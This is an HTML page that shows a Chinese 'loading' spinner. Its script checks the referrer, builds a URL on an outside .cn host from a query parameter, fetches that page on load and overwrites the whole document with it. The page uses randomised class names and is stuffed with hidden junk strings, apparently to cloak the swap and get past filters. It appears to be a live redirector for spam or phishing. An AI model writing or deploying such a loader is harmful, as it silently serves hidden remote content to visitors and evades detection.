<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .MP0PeyO9Ln {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .MP0PeyO9Ln .saEESoA {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .MP0PeyO9Ln .content {
            line-height: 50px;
            text-align: center
        }

        .MP0PeyO9Ln .img {
            width: 100%
        }

        .MP0PeyO9Ln .f7P03DVfk2 {
            text-align: center
        }

        .MP0PeyO9Ln .f7P03DVfk2 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .MP0PeyO9Ln .f7P03DVfk2 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .MP0PeyO9Ln .f7P03DVfk2 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .MP0PeyO9Ln .f7P03DVfk2 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .MP0PeyO9Ln .f7P03DVfk2 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .MP0PeyO9Ln .f7P03DVfk2 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .MP0PeyO9Ln .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function eXenrawTN(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var kMvNNEq = eXenrawTN('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ kMvNNEq +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ kMvNNEq +".html?a=share";
		}
		
        CfdoqPoql=url+"#"+new Date().getTime();
        CfdoqPoql && function() {
            $.get(CfdoqPoql, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >T0ppUuFZ3JL</h1>
<h1 style='display:none' >T0ppUuFZ3JL</h1>
<div style='display:none'>oeh2Daxjs5sDTdMll11VBudXOL9UzHl3RxHc3AK2WLEy7rgOXGq9MGqukmFV0vy5HEPa</div>
<ul style='display:none' >OsFSth0pY6v0XxAQWcGjWbTXF6rR9F6zVmPsjhfVgFdKbtKWQNcLOrTsgp</ul>
<h1 style='display:none' >T0ppUuFZ3JL</h1>
<img  src='' style='display:none'><div class="MP0PeyO9Ln">
    <div class="saEESoA">
        <div class="f7P03DVfk2">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>rdhKu3FMbjS0cgD3XhcO7iTk2HCy0z8v0GPjCFWN782JyixH8KOYzNwX2snXDjhMERQ9izvWSrQUEe1aG88c6ZI592</p>
<span style='display:none'>BzI9SqJAZupKk394bDYuRKiw9LUtJAPlfkRXfJu4F1KO1bct4lFnnv4fcbKTFjy6lNo7hFu</span>
<a  href='#' style='display:none'>AF17pNORxfUR</a>
<span style='display:none'>BzI9SqJAZupKk394bDYuRKiw9LUtJAPlfkRXfJu4F1KO1bct4lFnnv4fcbKTFjy6lNo7hFu</span>
<p  style='display:none'>rdhKu3FMbjS0cgD3XhcO7iTk2HCy0z8v0GPjCFWN782JyixH8KOYzNwX2snXDjhMERQ9izvWSrQUEe1aG88c6ZI592</p>
<span style='display:none'>BzI9SqJAZupKk394bDYuRKiw9LUtJAPlfkRXfJu4F1KO1bct4lFnnv4fcbKTFjy6lNo7hFu</span>
<li style='display:none' >r4KllzLbspBdnfwyKB38vri2qnpk3Cso6BV5vRPRPdG</li>
<img  src='' style='display:none'>
<b style='display:none' >b1N9Ez4wl1669yoVcT1nWGqIYKC89KJZUsBSg12Dja9Z0SmujggsJh</b>
<span style='display:none'>BzI9SqJAZupKk394bDYuRKiw9LUtJAPlfkRXfJu4F1KO1bct4lFnnv4fcbKTFjy6lNo7hFu</span></body>
</html>